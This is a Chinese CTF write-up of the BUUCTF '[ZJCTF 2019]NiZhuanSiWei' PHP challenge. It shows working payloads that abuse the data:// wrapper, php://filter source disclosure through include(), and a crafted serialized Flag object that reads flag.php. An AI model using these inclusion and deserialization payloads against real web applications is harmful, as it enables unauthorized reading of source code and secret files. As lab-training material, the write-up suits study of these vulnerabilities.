lunan0320
lunan0320

BUUCTF-[ZJCTF 2019]NiZhuanSiWei

BUUCTF-[ZJCTF 2019]NiZhuanSiWei

一、知识点

1、php各种协议,data://,php://

payload构造:

text=data://text/plain,welcome to the zjctf

data协议解释:https://www.php.net/manual/zh/wrappers.data.php

2、文件包含

payload构造:

file=php://filter/read=convert.base64-encode/resource=useless.php
3、反序列化
  

class Flag{  //flag.php 
    public $file; 
    public function __tostring(){ 
        if(isset($this->file)){ 
            echo file_get_contents($this->file); 
            echo "
";
        return ("U R SO CLOSE !///COME ON PLZ");
        } 
    } 
} 
?>

构造代码如下:

  

class Flag{ 
    public $file=flag.php; 
    public function __tostring(){ 
        if(isset($this->file)){ 
            echo file_get_contents($this->file); 
            echo "
";
        return ("U R SO CLOSE !///COME ON PLZ");
        } 
    } 
} 
$a=new Flag();
echo serialize($a);	
echo urlencode(serialize($a));
?>

二、解题过程

1、代码审计

BUUCTF-[ZJCTF 2019]NiZhuanSiWei_第1张图片

2、file_get_contents和data协议
(file_get_contents($text,'r') === "welcome to the zjctf"

使用php的data协议

payload如下:

data://text/plain;base64

text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

或者

text=data://text/plain,welcome to the zjctf

file_get_contents函数

会把文件中的内容读入一个字符串中

data协议解释

data协议可以使你输入得字符串作为数据流

3、include($file)文件包含
else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
}

关键的payload:

file=php://filter/read=convert.base64-encode/resource=useless.php

那么第二步完整payload

text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php

得到base64密文

PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=

4、useless.php得代码

BUUCTF-[ZJCTF 2019]NiZhuanSiWei_第2张图片

  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "
";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  

?>

BUUCTF-[ZJCTF 2019]NiZhuanSiWei_第3张图片

我们发现useless.php是一个类,并且提示我们flag在flag.php

明确了文件位置就可以开始构造pop链。

第三步的关键payload3:

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

BUUCTF-[ZJCTF 2019]NiZhuanSiWei_第4张图片

利用如下代码生成。


class Flag{  //flag.php
    public $file = "flag.php";
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "
";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}

$demo = new Flag();
$u = serialize($demo);
echo $u;
?>
5、完整payload
text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

BUUCTF-[ZJCTF 2019]NiZhuanSiWei_第5张图片

直接查看网页源码,得到flag:
BUUCTF-[ZJCTF 2019]NiZhuanSiWei_第6张图片

你可能感兴趣的:(CTF,Web,php,web,安全)

  • Web组件适配网页中iframe
    场景描述:当使用web组件加载带有iframe的页面时,由于H5的iframe标签的几个限制条件,可能会出现以下问题:1.由于iframe也要遵守浏览器同源策略,也有对应的白名单限制,所以也会出现跨域或者无法加载的问题,大多出现在本地或沙箱中的H5资源内联iframe时,并且cookie有时候也设置不上2.在应用侧调用runJavascript方法调用不到iframe里面,且主frame和ifra
  • windows 添加永久路由 的作用,拓扑 三希 路由
    在Windows中添加永久路由具有以下重要作用:一、作用网络流量控制可以指定特定的网络流量通过特定的路径进行传输。例如,当存在多个网络连接时,可以将特定的IP地址范围或应用程序的流量导向特定的网络接口,以实现负载均衡或优化网络性能。对于企业网络环境中,不同部门或应用可能有不同的网络需求,通过添加永久路由可以更好地管理和控制网络流量,确保关键业务的网络质量。网络隔离与安全可以将某些特定的网络段与其他
  • 看板软件私有化:提升企业运营效率的关键一步 项目管理软件
    看板作为一种高效的项目管理工具,已被广泛应用于软件开发、产品设计、市场营销等各个领域。然而,对于许多企业来说,使用SaaS版本的看板软件存在数据安全、定制化需求、成本控制等方面的顾虑。看板软件私有化部署方案应运而生,为企业提供安全可靠、高度可定制的项目管理解决方案。一、数据安全:企业发展的生命线对于金融、医疗、政府等对数据安全要求极高的行业来说,数据泄露可能导致巨大的经济损失和声誉风险。看板软件私
  • APO v1.3.0 更新:支持将第三方告警事件接入平台,统一关联分析告警事件 kubernetes
    在APOv1.3.0版本中,我们引入了对第三方告警事件的全面支持,旨在为用户提供一个更为集成和高效的告警分析平台。此次更新允许用户将来自不同来源的告警信息统一接入APO平台,从而实现告警事件的集中管理和关联分析。目前支持接入Prometheus(AlertManager)、Zabbix和任意支持以Webhook发送的告警事件。告警接入后在服务详情中会自动将相关告警事件关联到服务上。同时在企业版的告
  • 批量检测微信小程序封禁状态的 PHP 脚本示例 php
    代码解析:设置AppID列表:修改$appIds数组,将'appid1','appid2','appid3'替换为您的小程序AppID。状态检查流程:使用file_get_contents函数请求API,获取小程序的状态信息。解析API返回结果:通过json_decode解析JSON格式的响应,根据code字段判断小程序的封禁状态,并输出相应提示。错误处理:如果接口调用失败或返回格式错误,脚本将输
  • 批量检测微信小程序封禁状态的 PHP 脚本示例 php
    定义AppID列表:修改$appIds数组中的'appid1','appid2','appid3'为您的实际小程序ID。调用API检查状态:通过file_get_contents调用指定的API接口获取响应数据。解析和处理API响应:使用json_decode解析JSON数据,并根据code字段输出相应的状态信息。错误处理:脚本会处理接口调用失败或数据格式不正确的情况,并给出相应的提示。
  • 批量检测多个微信小程序的封禁状态源码、接口 php微信小程序
    PHP脚本示例,用于批量检测多个微信小程序的封禁状态。您可以将脚本中的appid1,appid2,appid3替换为实际的小程序应用ID,从而获取每个小程序的状态信息。代码说明:设置需要检查的AppID列表:修改$appIds数组中的'appid1','appid2','appid3'为您实际的小程序应用ID。检查每个AppID的状态:脚本通过file_get_contents函数调用API接口,
  • 使用python开发flsak_FlaskWeb开发:基于Python的Web应用开发实战 RoseofVersailles 使用python开发flsak
    本书不仅适合初级Web开发人员学习阅读,更是Python程序员用来学习高级Web开发技术的优秀参考书。•学习Flask应用的基本结构,编写示例应用;•使用必备的组件,包括模板、数据库、Web表单和电子邮件支持;•使用包和模块构建可伸缩的大型应用;•实现用户认证、角色和个人资料;•在博客网站中重用模板、分页显示列表以及使用富文本;•使用基于Flask的REST式API,在智能手机、平板电脑和其他第三
  • 未来的量子通信:从量子密钥分发到量子互联网的安全通信 AI天才研究院 计算DeepSeekR1&大数据AI人工智能大模型AI大模型企业级应用开发实战javapythonjavascriptkotlingolang架构人工智能大厂程序员硅基计算碳基计算认知计算生物计算深度学习神经网络大数据AIGCAGILLM系统架构设计软件哲学Agent程序员实现财富自由
    未来的量子通信:从量子密钥分发到量子互联网的安全通信关键词:量子通信量子密钥分发量子互联网安全通信量子隐形传态摘要:本文旨在探讨量子通信的广阔前景,从量子密钥分发到量子互联网的安全通信。我们将逐步分析量子通信的核心概念、技术原理以及其实际应用,旨在为读者提供一个清晰而全面的理解。通过深入探讨量子密钥分发(QKD)和量子隐形传态(CHT)的基本原理,以及量子重复器和量子中继的概念,我们将展示量子通信
  • 量子计算信息安全威胁与应对 岛屿旅人 网络安全行业分析量子计算web安全人工智能安全网络网络安全
    文章目录前言一、量子计算信息安全威胁及影响1.2量子计算发展迅速,安全威胁日益迫近二、PQC研究与应用进展2.1欧美在PQC领域研究近三十年,积累深厚2.2NIST引领PQC标准制定,取得初步成果2.3美国全方位布局加快推动PQC迁移与应用三、PQC应用发展前景3.1PQC算法和应用安全性需进一步验证3.2PQC算法国际标准将持续开展研究3.3PQC升级迁移是一项长期系统性工程四、QKD技术优劣势
  • 2025最新版二级域名分发最新开心版 支持易支付接口和聚合登录接口 专业软件系统开发 源码下载付费域名分发域名分发系统源码
    内容目录一、详细介绍宝塔面板环境PHP版本8.0至8.3PHP扩展SG15Mysql5.6或5.71Panel环境二、效果展示1.部分代码2.效果图展示请添加图片描述![请添加图片描述](https://i-blog.csdnimg.cn/direct/d4d7fc61d2e8483e92b2a828c0cb27b2.png)三、学习资料下载一、详细介绍一站式对域名进行二级分发,自助添加,自助修改
  • vite和react有什么区别? 因上精进,果上随缘 Javascriptreact.jsjavascript前端
    Vite和React在功能和定位上有明显的区别。Vite是一个基于浏览器原生ESimports的开发服务器和构建工具,旨在弥合当前和下一代Web开发之间的差距。它专注于为开发人员和现代Web项目提供更快、更高性能的体验。Vite的主要特性包括快速的冷启动、及时的热模块更新和真正的按需加载。它使用原生ESM作为模块系统,利用浏览器对ESM的支持,在开发时无需打包,从而实现了极速的启动速度和热模块替换
  • 数据库MySQL 8.0.32安装包网盘资源下载(附教程) 听风说雨的人儿 数据库mysql百度云
    如大家所熟悉的,MySQL是一个开源的关系型数据库管理系统(RDBMS)。它使用SQL(结构化查询语言)来管理数据,允许用户定义表、字段、索引和关系,并通过SQL语句来查询、更新和管理数据。MySQL支持多种操作系统,包括Windows、Linux和MacOS等,并且广泛用于各种应用程序中,如Web应用程序、数据仓库和电子商务系统等。MySQL的优势:成本效益与开源特性作为一个开源数据库,MySQ
  • Java基础面试题day02——数据类型 华农第一蒟蒻 面试java开发语言
    1.八种基本的数据类型?Java支持的数据类型分为两类:基本数据类型和引用数据类型基本数据类型:数值型:整数类型byte、short、int、long浮点类型float、double字符型:char布尔型:boolean2.long和int可以互转吗?可以;由于long类型的范围比int类型大,因此将int转换为long是安全的,而将long转换为int可能会导致数据丢失或者溢出。将int转换为l
  • Java中JWT(JSON Web Token)的运用 华农第一蒟蒻 java修炼javajson前端springboottoken
    目录1.JWT的结构2.JWT的优点3.JWT的流转过程4.具体案例一、项目结构二、依赖配置三、用户模型四、JWT工具类五、JWT请求过滤器六、安全配置七、身份验证控制器八、测试JWTJWT(JSONWebToken)是一种开放标准(RFC7519),用于在网络应用环境间以紧凑的方式安全地传递信息。JWT可以被用作身份验证和信息交换的手段,特别适合用于前后端分离的应用程序。1.JWT的结构JWT由
  • Windows操作系统部署Tomcat详细讲解 web15117360223 面试学习路线阿里巴巴windowstomcatjava
    Tomcat是一个开源的JavaServlet容器,用于处理JavaWeb应用程序的请求和响应。以下是关于Tomcat的用法大全:一、安装Tomcat下载访问ApacheTomcat官方网站(https://tomcat.apache.org/),根据你的操作系统(如Windows、Linux、macOS)和需求选择合适的版本进行下载。例如,对于开发环境,通常选择较新的稳定版本。安装(以Windo
  • Python学习教程:必须掌握的Cookie知识点都在这里了 weixin_30387339 python爬虫javascriptViewUI
    今天我们来全面了解一下Cookie(小饼干)相关的知识!篇幅有点长,在学习Python的伙伴或者有兴趣的你,可以耐心看哦!相信很多同学肯定听过Cookie这个东西,也大概了解其作用,但是其原理以及如何设置,可能没有做过web的同学并不是非常清楚,以前的Python学习教程中其实有跟大家提到过,那今天就带大家详细了解下Cookie相关的知识!一、诞生背景爬虫系列教程的第一篇:HTTP详解中我们便说过
  • Knox原理与代码实例讲解 AI天才研究院 计算DeepSeekR1&大数据AI人工智能大模型计算科学神经计算深度学习神经网络大数据人工智能大型语言模型AIAGILLMJavaPython架构设计AgentRPA
    Knox原理与代码实例讲解1.背景介绍在现代分布式系统中,安全性和隔离性是非常重要的需求。ApacheKnox是一个反向代理服务器,旨在为ApacheHadoop集群提供单一入口点,增强安全性和集中化管理。它位于Hadoop集群与客户端应用程序之间,充当网关和负载均衡器的角色。Knox的主要目标是:提供集中式身份验证和授权,减轻客户端应用程序的负担。实现多租户支持,允许不同的组织或部门安全地共享同
  • Shiro 框架详解 大家都说我身材好 Java高级springjavashiro
    Shiro是一款轻量级的Java安全框架,提供了身份认证、授权、加密和会话管理等功能。它可以集成到任何JavaWeb应用程序中,并且易于使用和扩展。Shiro的设计理念是简洁而灵活,不仅可以应用于Web应用程序,还可以应用于命令行、移动设备和分布式系统等各种应用场景。1.Shiro的概述Shiro是一个开源的Java安全框架,由Apache开发和维护。Shiro可以帮助开发人员快速实现安全特性,包
  • app,waf笔记 qq_45981247 笔记
    API攻防知识点:1、HTTP接口类-测评2、RPC类接口-测评3、WebService类-测评内容点:SOAP(SimpleObjectAccessProtocol)简单对象访问协议是交换数据的一种协议规范,是一种轻量级的、简单的、基于XML(标准通用标记语言下的一个子集)的协议,它被设计成在WEB上交换结构化的和固化的信息。SOAP部署WebService的专有协议。SOAP使用HTTP来发送
  • python-web session LennyZzz
    #session-为了应对HTTP协议的无状态性-用来保存用户比较敏感的信息-属于request的一个属性,其实在数据库中常用操作:-request.session.get(key,value)-request.session.clear()-request.session[key]=value-request.session.flush()删除当前会话,清楚会话的cookie-delreques
  • WEB安全--SQL注入--floor报错注入 神经毒素 web安全安全sql数据库
    一、原理:floor()报错注入需要组合count()、rand()、groupby()等函数使用,通过一些手段使数据库在处理语句时产生主键重复的报错,从而达到爆出信息的目的二、内容:?id=-1'or(select1from(selectcount(*),concat(database(),floor(rand(0)*2))xfrominformation_schema.tablesgroupb
  • Httprint 指纹识别技术:网络安全的关键洞察 蚂蚁质量 安全测试测试管理软件测试安全性测试
    引言Http指纹识别现在已经成为应用程序安全中一个新兴的话题,Http服务器和Http应用程序安全也已经成为网络安全中的重要一部分。从网络管理的立场来看,保持对各种web服务器的监视和追踪使得Http指纹识别变的唾手可得,Http指纹识别可以使得信息系统和安全策略变的自动化,在基于已经设置了审核策略的特殊的平台或是特殊的web服务器上,安全测试工具可以使用Http指纹识别来减少测试所需要的配置。本
  • Python的那些事第二十三篇:Express(Node.js)与 Python:一场跨语言的浪漫邂逅 暮雨哀尘 Python的那些事linuxpythonnode.jsexpress服务器开发语言web开发
    摘要在当今的编程世界里,Node.js和Python像是两个性格迥异的超级英雄,一个以速度和灵活性著称,另一个则以强大和优雅闻名。本文将探讨如何通过Express框架将Node.js和Python结合起来,打造出一个高效、有趣的Web应用。我们将通过一系列幽默风趣的实例和表格,展示这种跨语言合作的无限可能。如果你厌倦了单调的技术论文,那么这篇论文绝对能让你眼前一亮!1.引言:当Node.js遇上P
  • 15. MySql高级之常用SQL技巧☆ 喵先生呢 #MySql高级mysql
    文章目录MySql高级之常用SQL技巧☆1.SQL执行顺序2.正则表达式使用3.MySQL常用函数3.1数字函数3.2字符串函数3.3日期函数3.4聚合函数☆MySql高级之常用SQL技巧☆1.SQL执行顺序编写顺序selectdistinctfromjoinONwheregroupbyhavingorderbylimit执行顺序fromonjoinwheregroupbyhavingselect
  • java web 项目中封装的下拉列表小组件:实现下拉列表使用者前后端0行代码 ... weixin_34383618 java前端后端ViewUI
    导读:主要从4个方面来阐述,1:背景;2:思路;3:代码实现;4:使用一:封装背景像easyui之类的纯前端组件,也有下拉列表组件,但是使用的时候,每个下拉列表,要配一个URL,以及设置URL反回来的值和select的text,和value的对应关系,这有2个问题:一使用者必须知道URL,二,如果页面有10个下拉表表,要请求后台10次,肯定影响性能,而我想要的是使用者只要申明用哪个数据字典就行了,
  • 文件共享服务器风险,如何提高共享文件的安全,可以从哪些方面入手? 曾秋雷 文件共享服务器风险
    原标题:如何提高共享文件的安全,可以从哪些方面入手?在企业的网络中,最常用的功能莫过于“共享文件”了。财务部门需要当月员工的考勤信息,人事部门可能不会亲自拿过去,而是在网络上共享;生产部门的生产报表也不会用书面的资料分发,而是放在网络的共享文件夹下,谁需要的话,就自己去查看就可以了,等等。类似的需求还有很多。可见,共享文件的功能,提高了企业办公的效率,使企业局域网应用中的一个不可缺的功能。但是,由
  • 在linux环境下启动es,linux上Elasticsearch 安装配置、网页访问 guo桀 在linux环境下启动es
    一、ElasticSearch简述ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTfulweb接口。Elasticsearch是用Java开发的,并作为Apache许可条款下的开放源码发布,是当前流行的企业级搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。我们建立一个网站或应用程序,并要添加搜索功能
  • OpenWebUI,RAG+外部知识库+AI写文的开源应用 m0_74824780 人工智能开源
    引言自从去年AI火起来之后,很多人便热衷于寻找适合自用的AI开源项目,把各家大模型API接入到自己的AI程序里,便可以通过AI辅助完成一系列日常任务,比如内容翻译/润色/总结/撰写、格式转换、数据分类、代码分析、角色扮演等等。一般情况下,大模型依靠自身训练数据便能够完成的任务质量偏高,像翻译总结、格式转换之类,市面上所有的AI程序基本都能够满足这一点需求;但是需要结合外部资料/超长上文信息/实时信
  • PHP 使用 Redis 实现分布式锁 半桶水专家 phpRedisphpredis分布式
    要在PHP中使用Redis实现分布式锁,可以使用类似的逻辑:通过SETNXPX命令获取锁,并通过唯一标识符(UUID)确保释放锁的正确性。以下是基于PHP的实现。PHP使用Redis实现分布式锁1.安装Redis扩展在PHP中使用Redis,你需要安装phpredis扩展。可以通过以下命令安装:peclinstallredis安装完成后,确保在php.ini中启用了Redis扩展:extensio
  • 多线程编程之理财 周凡杨 java多线程生产者消费者理财
          现实生活中,我们一边工作,一边消费,正常情况下会把多余的钱存起来,比如存到余额宝,还可以多挣点钱,现在就有这个情况:我每月可以发工资20000万元 (暂定每月的1号),每月消费5000(租房+生活费)元(暂定每月的1号),其中租金是大头占90%,交房租的方式可以选择(一月一交,两月一交、三月一交),理财:1万元存余额宝一天可以赚1元钱,
  • [Zookeeper学习笔记之三]Zookeeper会话超时机制 bit1129 zookeeper
    首先,会话超时是由Zookeeper服务端通知客户端会话已经超时,客户端不能自行决定会话已经超时,不过客户端可以通过调用Zookeeper.close()主动的发起会话结束请求,如下的代码输出内容 Created /zoo-739160015 CONNECTEDCONNECTED .............CONNECTEDCONNECTED CONNECTEDCLOSEDCLOSED
  • SecureCRT快捷键 daizj secureCRT快捷键
    ctrl + a : 移动光标到行首ctrl + e :移动光标到行尾crtl + b: 光标前移1个字符crtl + f: 光标后移1个字符crtl + h : 删除光标之前的一个字符ctrl + d :删除光标之后的一个字符crtl + k :删除光标到行尾所有字符crtl + u : 删除光标至行首所有字符crtl + w:  删除光标至行首
  • Java 子类与父类这间的转换 周凡杨 java 父类与子类的转换
        最近同事调的一个服务报错,查看后是日期之间转换出的问题。代码里是把 java.sql.Date 类型的对象 强制转换为 java.sql.Timestamp 类型的对象。报java.lang.ClassCastException。       代码:            
  • 可视化swing界面编辑 朱辉辉33 eclipseswing
          今天发现了一个WindowBuilder插件,功能好强大,啊哈哈,从此告别手动编辑swing界面代码,直接像VB那样编辑界面,代码会自动生成。       首先在Eclipse中点击help,选择Install New Software,然后在Work with中输入WindowBui
  • web报表工具FineReport常用函数的用法总结(文本函数) 老A不折腾 finereportweb报表工具报表软件java报表
    文本函数 CHAR CHAR(number):根据指定数字返回对应的字符。CHAR函数可将计算机其他类型的数字代码转换为字符。 Number:用于指定字符的数字,介于1Number:用于指定字符的数字,介于165535之间(包括1和65535)。 示例: CHAR(88)等于“X”。 CHAR(45)等于“-”。   CODE CODE(text):计算文本串中第一个字
  • mysql安装出错 林鹤霄 mysql安装
    [root@localhost ~]# rpm -ivh MySQL-server-5.5.24-1.linux2.6.x86_64.rpm Preparing...                #####################
  • linux下编译libuv aigo libuv
    下载最新版本的libuv源码,解压后执行: ./autogen.sh   这时会提醒找不到automake命令,通过一下命令执行安装(redhat系用yum,Debian系用apt-get): # yum -y install automake # yum -y install libtool     如果提示错误:make: *** No targe
  • 中国行政区数据及三级联动菜单 alxw4616
    近期做项目需要三级联动菜单,上网查了半天竟然没有发现一个能直接用的! 呵呵,都要自己填数据....我了个去这东西麻烦就麻烦的数据上. 哎,自己没办法动手写吧. 现将这些数据共享出了,以方便大家.嗯,代码也可以直接使用   文件说明 lib\area.sql -- 县及县以上行政区划分代码(截止2013年8月31日)来源:国家统计局 发布时间:2014-01-17 15:0
  • 哈夫曼加密文件 百合不是茶 哈夫曼压缩哈夫曼加密二叉树
     在上一篇介绍过哈夫曼编码的基础知识,下面就直接介绍使用哈夫曼编码怎么来做文件加密或者压缩与解压的软件,对于新手来是有点难度的,主要还是要理清楚步骤;   加密步骤:  1,统计文件中字节出现的次数,作为权值   2,创建节点和哈夫曼树   3,得到每个子节点01串   4,使用哈夫曼编码表示每个字节  
  • JDK1.5 Cyclicbarrier实例 bijian1013 javathreadjava多线程Cyclicbarrier
    CyclicBarrier类 一个同步辅助类,它允许一组线程互相等待,直到到达某个公共屏障点 (common barrier point)。在涉及一组固定大小的线程的程序中,这些线程必须不时地互相等待,此时 CyclicBarrier 很有用。因为该 barrier 在释放等待线程后可以重用,所以称它为循环的 barrier。 CyclicBarrier支持一个可选的 Runnable 命令,
  • 九项重要的职业规划 bijian1013 工作学习
    一. 学习的步伐不停止        古人说,活到老,学到老。终身学习应该是您的座右铭。        世界在不断变化,每个人都在寻找各自的事业途径。        您只有保证了足够的技能储
  • 【Java范型四】范型方法 bit1129 java
    范型参数不仅仅可以用于类型的声明上,例如   package com.tom.lang.generics; import java.util.List; public class Generics<T> { private T value; public Generics(T value) { this.value =
  • 【Hadoop十三】HDFS Java API基本操作 bit1129 hadoop
      package com.examples.hadoop; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.fs.FSDataInputStream; import org.apache.hadoop.fs.FileStatus; import org.apache.hadoo
  • ua实现split字符串分隔 ronin47 lua split
    LUA并不象其它许多"大而全"的语言那样,包括很多功能,比如网络通讯、图形界面等。但是LUA可以很容易地被扩展:由宿主语言(通常是C或 C++)提供这些功能,LUA可以使用它们,就像是本来就内置的功能一样。LUA只包括一个精简的核心和最基本的库。这使得LUA体积小、启动速度快,从 而适合嵌入在别的程序里。因此在lua中并没有其他语言那样多的系统函数。习惯了其他语言的字符串分割函
  • java-从先序遍历和中序遍历重建二叉树 bylijinnan java
    public class BuildTreePreOrderInOrder { /** * Build Binary Tree from PreOrder and InOrder * _______7______ / \ __10__ ___2 / \ / 4
  • openfire开发指南《连接和登陆》 开窍的石头 openfire开发指南smack
    第一步     官网下载smack.jar包     下载地址:http://www.igniterealtime.org/downloads/index.jsp#smack 第二步     把smack里边的jar导入你新建的java项目中 开始编写smack连接openfire代码 p
  • [移动通讯]手机后盖应该按需要能够随时开启 comsci 移动
        看到新的手机,很多由金属材质做的外壳,内存和闪存容量越来越大,CPU速度越来越快,对于这些改进,我们非常高兴,也非常欢迎      但是,对于手机的新设计,有几点我们也要注意      第一:手机的后盖应该能够被用户自行取下来,手机的电池的可更换性应该是必须保留的设计,
  • 20款国外知名的php开源cms系统 cuiyadll cms
    内容管理系统,简称CMS,是一种简易的发布和管理新闻的程序。用户可以在后端管理系统中发布,编辑和删除文章,即使您不需要懂得HTML和其他脚本语言,这就是CMS的优点。 在这里我决定介绍20款目前国外市面上最流行的开源的PHP内容管理系统,以便没有PHP知识的读者也可以通过国外内容管理系统建立自己的网站。 1. Wordpress WordPress的是一个功能强大且易于使用的内容管
  • Java生成全局唯一标识符 darrenzhu javauuiduniqueidentifierid
    How to generate a globally unique identifier in Java http://stackoverflow.com/questions/21536572/generate-unique-id-in-java-to-label-groups-of-related-entries-in-a-log http://stackoverflow
  • php安装模块检测是否已安装过, 使用的SQL语句 dcj3sjt126com sql
    SHOW [FULL] TABLES [FROM db_name] [LIKE 'pattern'] SHOW TABLES列举了给定数据库中的非TEMPORARY表。您也可以使用mysqlshow db_name命令得到此清单。 本命令也列举数据库中的其它视图。支持FULL修改符,这样SHOW FULL TABLES就可以显示第二个输出列。对于一个表,第二列的值为BASE T
  • 5天学会一种 web 开发框架 dcj3sjt126com Web框架framework
    web framework层出不穷,特别是ruby/python,各有10+个,php/java也是一大堆 根据我自己的经验写了一个to do list,按照这个清单,一条一条的学习,事半功倍,很快就能掌握 一共25条,即便很磨蹭,2小时也能搞定一条,25*2=50。只需要50小时就能掌握任意一种web框架 各类web框架大同小异:现代web开发框架的6大元素,把握主线,就不会迷路 建议把本文
  • Gson使用三(Map集合的处理,一对多处理) eksliang jsongsonGson mapGson 集合处理
    转载请出自出处:http://eksliang.iteye.com/blog/2175532 一、概述        Map保存的是键值对的形式,Json的格式也是键值对的,所以正常情况下,map跟json之间的转换应当是理所当然的事情。 二、Map参考实例 package com.ickes.json; import java.lang.refl
  • cordova实现“再点击一次退出”效果 gundumw100 android
    基本的写法如下: document.addEventListener("deviceready", onDeviceReady, false); function onDeviceReady() { //navigator.splashscreen.hide(); document.addEventListener("b
  • openldap configuration leaning note iwindyforest configuration
    hostname // to display the computer name hostname <changed name> // to change go to: /etc/sysconfig/network, add/modify HOSTNAME=NEWNAME to change permenately dont forget to change /etc/hosts
  • Nullability and Objective-C 啸笑天 Objective-C
    https://developer.apple.com/swift/blog/?id=25   http://www.cocoachina.com/ios/20150601/11989.html   http://blog.csdn.net/zhangao0086/article/details/44409913   http://blog.sunnyxx
  • jsp中实现参数隐藏的两种方法 macroli JavaScriptjsp
    在一个JSP页面有一个链接,//确定是一个链接?点击弹出一个页面,需要传给这个页面一些参数。//正常的方法是设置弹出页面的src="***.do?p1=aaa&p2=bbb&p3=ccc"//确定目标URL是Action来处理?但是这样会在页面上看到传过来的参数,可能会不安全。要求实现src="***.do",参数通过其他方法传!//////
  • Bootstrap A标签关闭modal并打开新的链接解决方案 qiaolevip 每天进步一点点学习永无止境bootstrap纵观千象
    Bootstrap里面的js modal控件使用起来很方便,关闭也很简单。只需添加标签 data-dismiss="modal" 即可。 可是偏偏有时候需要a标签既要关闭modal,有要打开新的链接,尝试多种方法未果。只好使用原始js来控制。   <a href="#/group-buy" class="btn bt
  • 二维数组在Java和C中的区别 流淚的芥末 javac二维数组数组
    Java代码:   public class test03 { public static void main(String[] args) { int[][] a = {{1},{2,3},{4,5,6}}; System.out.println(a[0][1]); } }  运行结果: Exception in thread "mai
  • systemctl命令用法 wmlJava linuxsystemctl
    对比表,以 apache / httpd 为例 任务 旧指令 新指令 使某服务自动启动 chkconfig --level 3 httpd on systemctl enable httpd.service 使某服务不自动启动 chkconfig --level 3 httpd off systemctl disable httpd.service 检查服务状态 service h
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他